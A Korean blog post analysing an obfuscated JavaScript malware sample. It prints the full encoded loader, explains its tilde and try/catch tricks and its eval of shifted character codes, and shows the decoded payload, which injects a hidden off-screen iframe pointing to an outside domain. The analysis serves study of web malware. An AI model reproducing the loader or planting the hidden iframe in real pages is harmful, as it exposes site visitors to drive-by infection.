본문으로 바로가기


1. 개요


이 난독화는 몇몇 난독화들이 중복적으로 사용되어 있다.


1.1. 원본 소스코드



asq=function(){return n[i];};ww=window;ss=String.fromCharCode;try{document.body=~1}catch(dgsgsdg){zz=12*2+1+1;whwej=12;}{try{whwej=~2;}catch(agdsg){whwej=0;}if(whwej){try{document.body++;}catch(bawetawe){if(ww.document){n="0xa,0xa,0x6a,0x67,0x21,0x29,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x74,0x43,0x7a,0x55,0x62,0x68,0x4f,0x62,0x6e,0x66,0x29,0x28,0x63,0x70,0x65,0x7a,0x28,0x2a,0x5c,0x31,0x5e,0x2a,0x7c,0xe,0xa,0xa,0xa,0x6a,0x67,0x73,0x62,0x6e,0x66,0x73,0x29,0x2a,0x3c,0xe,0xa,0xa,0x7e,0x21,0x66,0x6d,0x74,0x66,0x21,0x7c,0xe,0xa,0xa,0xa,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x78,0x73,0x6a,0x75,0x66,0x29,0x23,0x3d,0x6a,0x67,0x73,0x62,0x6e,0x66,0x21,0x74,0x73,0x64,0x3e,0x28,0x69,0x75,0x75,0x71,0x3b,0x30,0x30,0x64,0x69,0x77,0x62,0x73,0x6c,0x70,0x77,0x74,0x6c,0x6a,0x2f,0x6a,0x6f,0x67,0x70,0x30,0x65,0x45,0x79,0x4d,0x71,0x53,0x31,0x4d,0x39,0x52,0x58,0x31,0x49,0x55,0x51,0x48,0x31,0x4e,0x79,0x62,0x4d,0x31,0x62,0x7b,0x58,0x79,0x31,0x4f,0x4c,0x4a,0x51,0x31,0x36,0x4e,0x6d,0x44,0x31,0x58,0x32,0x37,0x74,0x30,0x28,0x21,0x78,0x6a,0x65,0x75,0x69,0x3e,0x28,0x32,0x31,0x31,0x28,0x21,0x69,0x66,0x6a,0x68,0x69,0x75,0x3e,0x28,0x32,0x31,0x31,0x28,0x21,0x74,0x75,0x7a,0x6d,0x66,0x3e,0x28,0x78,0x6a,0x65,0x75,0x69,0x3b,0x32,0x31,0x31,0x71,0x79,0x3c,0x69,0x66,0x6a,0x68,0x69,0x75,0x3b,0x32,0x31,0x31,0x71,0x79,0x3c,0x71,0x70,0x74,0x6a,0x75,0x6a,0x70,0x6f,0x3b,0x62,0x63,0x74,0x70,0x6d,0x76,0x75,0x66,0x3c,0x77,0x6a,0x74,0x6a,0x63,0x6a,0x6d,0x6a,0x75,0x7a,0x3b,0x69,0x6a,0x65,0x65,0x66,0x6f,0x3c,0x6d,0x66,0x67,0x75,0x3b,0x2e,0x32,0x31,0x31,0x31,0x31,0x71,0x79,0x3c,0x75,0x70,0x71,0x3b,0x31,0x3c,0x28,0x3f,0x3d,0x30,0x6a,0x67,0x73,0x62,0x6e,0x66,0x3f,0x23,0x2a,0x3c,0xe,0xa,0xa,0x7e,0xe,0xa,0xa,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x6a,0x67,0x73,0x62,0x6e,0x66,0x73,0x29,0x2a,0x7c,0xe,0xa,0xa,0xa,0x77,0x62,0x73,0x21,0x67,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62,0x6e,0x66,0x28,0x2a,0x3c,0x67,0x2f,0x74,0x66,0x75,0x42,0x75,0x75,0x73,0x6a,0x63,0x76,0x75,0x66,0x29,0x28,0x74,0x73,0x64,0x28,0x2d,0x28,0x69,0x75,0x75,0x71,0x3b,0x30,0x30,0x64,0x69,0x77,0x62,0x73,0x6c,0x70,0x77,0x74,0x6c,0x6a,0x2f,0x6a,0x6f,0x67,0x70,0x30,0x65,0x45,0x79,0x4d,0x71,0x53,0x31,0x4d,0x39,0x52,0x58,0x31,0x49,0x55,0x51,0x48,0x31,0x4e,0x79,0x62,0x4d,0x31,0x62,0x7b,0x58,0x79,0x31,0x4f,0x4c,0x4a,0x51,0x31,0x36,0x4e,0x6d,0x44,0x31,0x58,0x32,0x37,0x74,0x30,0x28,0x2a,0x3c,0x67,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x6d,0x66,0x67,0x75,0x3e,0x28,0x2e,0x32,0x31,0x31,0x31,0x31,0x71,0x79,0x28,0x3c,0x67,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x77,0x6a,0x74,0x6a,0x63,0x6a,0x6d,0x6a,0x75,0x7a,0x3e,0x28,0x69,0x6a,0x65,0x65,0x66,0x6f,0x28,0x3c,0x67,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x75,0x70,0x71,0x3e,0x28,0x31,0x28,0x3c,0x67,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x71,0x70,0x74,0x6a,0x75,0x6a,0x70,0x6f,0x3e,0x28,0x62,0x63,0x74,0x70,0x6d,0x76,0x75,0x66,0x28,0x3c,0x67,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x75,0x70,0x71,0x3e,0x28,0x31,0x28,0x3c,0x67,0x2f,0x74,0x66,0x75,0x42,0x75,0x75,0x73,0x6a,0x63,0x76,0x75,0x66,0x29,0x28,0x78,0x6a,0x65,0x75,0x69,0x28,0x2d,0x28,0x32,0x31,0x31,0x28,0x2a,0x3c,0x67,0x2f,0x74,0x66,0x75,0x42,0x75,0x75,0x73,0x6a,0x63,0x76,0x75,0x66,0x29,0x28,0x69,0x66,0x6a,0x68,0x69,0x75,0x28,0x2d,0x28,0x32,0x31,0x31,0x28,0x2a,0x3c,0xe,0xa,0xa,0xa,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x74,0x43,0x7a,0x55,0x62,0x68,0x4f,0x62,0x6e,0x66,0x29,0x28,0x63,0x70,0x65,0x7a,0x28,0x2a,0x5c,0x31,0x5e,0x2f,0x62,0x71,0x71,0x66,0x6f,0x65,0x44,0x69,0x6a,0x6d,0x65,0x29,0x67,0x2a,0x3c,0xe,0xa,0xa,0x7e".split(",");h=2;s="";for(i=0;i-700!=0;i++){k=i;s=s.concat(ss(eval(asq())-1));}z=s;eval(""+s);}}}}


2. 분석


2.1. 난독화 소스코드 분석



asq = function () {
  return n[i];
}; // function에 문자배열 0번부터 하나씩 반환해 준다.
ww = window;
ss = String.fromCharCode;
try {
  document.body = ~1 // document.body에 -2를 저장 -> 에러 발생
  // 자바스크립트에서 틸드(tilde : ~) 연산은 0과 1을 모두 뒤집는 Bitwise NOT 연산자
  // 8자리로 표현해서 0000 0001을 틸드연산하면 1111 1110 이 됨
  // 맨 앞의 비트는 부호비트이기 때문에 1의 보수 2의 보수로 계산해 보면 -2가 됨
  // 편하게 ~n = -(n+1)로 연산 가능
} catch (dgsgsdg) {
  zz = 12 * 2 + 1 + 1; // 쓸모없는 연산
  whwej = 12; // 쓸모없는 값
} {
  try {
    whwej = ~2; // whwej에 -3을 저장
  }
  catch (agdsg) {
    whwej = 0; // 실행 안함
  }
  if (whwej) { // if (-3) 자바스크립트는 0이 아닌 모든 숫자는 true로 인식
    try {
      document.body++; // 에러 발생
    }
    catch (bawetawe) {
      if (ww.document) { // window.document로 발생하는 문자열 또한 true로 인식
        n = "0xa,0xa,0x6a,0x67,0x21,0x29,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x74,0x43,0x7a,0x55,0x62,0x68,0x4f,0x62,0x6e,0x66,0x29,0x28,0x63,0x70,0x65,0x7a,0x28,0x2a,0x5c,0x31,0x5e,0x2a,0x7c,0xe,0xa,0xa,0xa,0x6a,0x67,0x73,0x62,0x6e,0x66,0x73,0x29,0x2a,0x3c,0xe,0xa,0xa,0x7e,0x21,0x66,0x6d,0x74,0x66,0x21,0x7c,0xe,0xa,0xa,0xa,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x78,0x73,0x6a,0x75,0x66,0x29,0x23,0x3d,0x6a,0x67,0x73,0x62,0x6e,0x66,0x21,0x74,0x73,0x64,0x3e,0x28,0x69,0x75,0x75,0x71,0x3b,0x30,0x30,0x64,0x69,0x77,0x62,0x73,0x6c,0x70,0x77,0x74,0x6c,0x6a,0x2f,0x6a,0x6f,0x67,0x70,0x30,0x65,0x45,0x79,0x4d,0x71,0x53,0x31,0x4d,0x39,0x52,0x58,0x31,0x49,0x55,0x51,0x48,0x31,0x4e,0x79,0x62,0x4d,0x31,0x62,0x7b,0x58,0x79,0x31,0x4f,0x4c,0x4a,0x51,0x31,0x36,0x4e,0x6d,0x44,0x31,0x58,0x32,0x37,0x74,0x30,0x28,0x21,0x78,0x6a,0x65,0x75,0x69,0x3e,0x28,0x32,0x31,0x31,0x28,0x21,0x69,0x66,0x6a,0x68,0x69,0x75,0x3e,0x28,0x32,0x31,0x31,0x28,0x21,0x74,0x75,0x7a,0x6d,0x66,0x3e,0x28,0x78,0x6a,0x65,0x75,0x69,0x3b,0x32,0x31,0x31,0x71,0x79,0x3c,0x69,0x66,0x6a,0x68,0x69,0x75,0x3b,0x32,0x31,0x31,0x71,0x79,0x3c,0x71,0x70,0x74,0x6a,0x75,0x6a,0x70,0x6f,0x3b,0x62,0x63,0x74,0x70,0x6d,0x76,0x75,0x66,0x3c,0x77,0x6a,0x74,0x6a,0x63,0x6a,0x6d,0x6a,0x75,0x7a,0x3b,0x69,0x6a,0x65,0x65,0x66,0x6f,0x3c,0x6d,0x66,0x67,0x75,0x3b,0x2e,0x32,0x31,0x31,0x31,0x31,0x71,0x79,0x3c,0x75,0x70,0x71,0x3b,0x31,0x3c,0x28,0x3f,0x3d,0x30,0x6a,0x67,0x73,0x62,0x6e,0x66,0x3f,0x23,0x2a,0x3c,0xe,0xa,0xa,0x7e,0xe,0xa,0xa,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x6a,0x67,0x73,0x62,0x6e,0x66,0x73,0x29,0x2a,0x7c,0xe,0xa,0xa,0xa,0x77,0x62,0x73,0x21,0x67,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62,0x6e,0x66,0x28,0x2a,0x3c,0x67,0x2f,0x74,0x66,0x75,0x42,0x75,0x75,0x73,0x6a,0x63,0x76,0x75,0x66,0x29,0x28,0x74,0x73,0x64,0x28,0x2d,0x28,0x69,0x75,0x75,0x71,0x3b,0x30,0x30,0x64,0x69,0x77,0x62,0x73,0x6c,0x70,0x77,0x74,0x6c,0x6a,0x2f,0x6a,0x6f,0x67,0x70,0x30,0x65,0x45,0x79,0x4d,0x71,0x53,0x31,0x4d,0x39,0x52,0x58,0x31,0x49,0x55,0x51,0x48,0x31,0x4e,0x79,0x62,0x4d,0x31,0x62,0x7b,0x58,0x79,0x31,0x4f,0x4c,0x4a,0x51,0x31,0x36,0x4e,0x6d,0x44,0x31,0x58,0x32,0x37,0x74,0x30,0x28,0x2a,0x3c,0x67,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x6d,0x66,0x67,0x75,0x3e,0x28,0x2e,0x32,0x31,0x31,0x31,0x31,0x71,0x79,0x28,0x3c,0x67,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x77,0x6a,0x74,0x6a,0x63,0x6a,0x6d,0x6a,0x75,0x7a,0x3e,0x28,0x69,0x6a,0x65,0x65,0x66,0x6f,0x28,0x3c,0x67,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x75,0x70,0x71,0x3e,0x28,0x31,0x28,0x3c,0x67,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x71,0x70,0x74,0x6a,0x75,0x6a,0x70,0x6f,0x3e,0x28,0x62,0x63,0x74,0x70,0x6d,0x76,0x75,0x66,0x28,0x3c,0x67,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x75,0x70,0x71,0x3e,0x28,0x31,0x28,0x3c,0x67,0x2f,0x74,0x66,0x75,0x42,0x75,0x75,0x73,0x6a,0x63,0x76,0x75,0x66,0x29,0x28,0x78,0x6a,0x65,0x75,0x69,0x28,0x2d,0x28,0x32,0x31,0x31,0x28,0x2a,0x3c,0x67,0x2f,0x74,0x66,0x75,0x42,0x75,0x75,0x73,0x6a,0x63,0x76,0x75,0x66,0x29,0x28,0x69,0x66,0x6a,0x68,0x69,0x75,0x28,0x2d,0x28,0x32,0x31,0x31,0x28,0x2a,0x3c,0xe,0xa,0xa,0xa,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x74,0x43,0x7a,0x55,0x62,0x68,0x4f,0x62,0x6e,0x66,0x29,0x28,0x63,0x70,0x65,0x7a,0x28,0x2a,0x5c,0x31,0x5e,0x2f,0x62,0x71,0x71,0x66,0x6f,0x65,0x44,0x69,0x6a,0x6d,0x65,0x29,0x67,0x2a,0x3c,0xe,0xa,0xa,0x7e".split(",");
        //split 메소드를 통해 ","를 잘라내여 배열로 데이터가 저장
        h = 2; // 쓸모없는 값
        s = ""; // s 변수 초기화
        for (i = 0; i - 700 != 0; i++) {
          k = i; // 쓸모없는 값
          s = s.concat(ss(eval(asq()) - 1));
          // s = s.concat(String.fromCharCode(eval(function ()) -1));
          // n에 배열로 저장된 값을 각각 1씩 빼며, 뺀 결과는 10진수 형태로 변환
          // fromCharCode를 통해 10진수의 값을 아스키코드 Char로 변환
          // concat 메소드를 사용하여 낱개의 결과를 하나의 배열로 연결
        }
        z = s; // 쓸모없는 값
        eval("" + s); // 완성된 s를 실행하기 위해 eval을 사용
      }
    }
  }
}


2.2. 난독화 해제



if (document.getElementsByTagName('body')[0]) {
  // body 태그의 존재 유무 확인
    iframer(); // body가 존재하면 iframer 함수를 실행
  } else {
    document.write("<iframe src='http://chvarkovski.info/dDxLpR0L8QW0HTPG0MxaL0azWx0NKIP05MlC0W16s/'width='100' height='100' style='width:100px;height:100px;position:absolute;visibility:hidden;left:-10000px;top:0;'></iframe>");
  } //body가 존재하지 않으면 코드실행
function iframer() {
  var f = document.createElement('iframe');
  f.setAttribute('src', 'http://chvarkovski.info/dDxLpR0L8QW0HTPG0MxaL0azWx0NKIP05MlC0W16s/');
  f.style.left = '-10000px';
  f.style.visibility = 'hidden';
  f.style.top = '0';
  f.style.position = 'absolute';
  f.style.top = '0';
  f.setAttribute('width', '100');
  f.setAttribute('height', '100');
  document.getElementsByTagName('body')[0].appendChild(f);
  // body에 iframe 요소를 선언하고 추가 파라미터를 저장
}


iframe 선언하는 방식 중에 DOM을 이용하여 하나의 요소로 선언할 수 있다. DOM을 이용하려면 body태그가 필요한데, 이 태그는 자바스크립트가 아닌 HTML 태그이다. 이러한 방식은 자바스크립트 엔진을 이용한 난독화를 분석하는 도구들은 자바스크립트로 인식하지 않기 때문에 하나의 Anti-DeObfuscation 기법이라 할 수 있다.


3. 정리


  • 자바스크립트 언어의 특징으로 0 값이 아닌 숫자는 모두 true로 인식
  • 음수 값을 틸드 연산을 이용하여 표현
  • 16진수 값을 변형
  • 조건부 실행
  • DOM 객체를 이용한 자바스크립트 실행
  • width, height 값이 시각적으로 보일 수 있는 크기라도 감출 수 있음



댓글을 달아 주세요

티스토리 툴바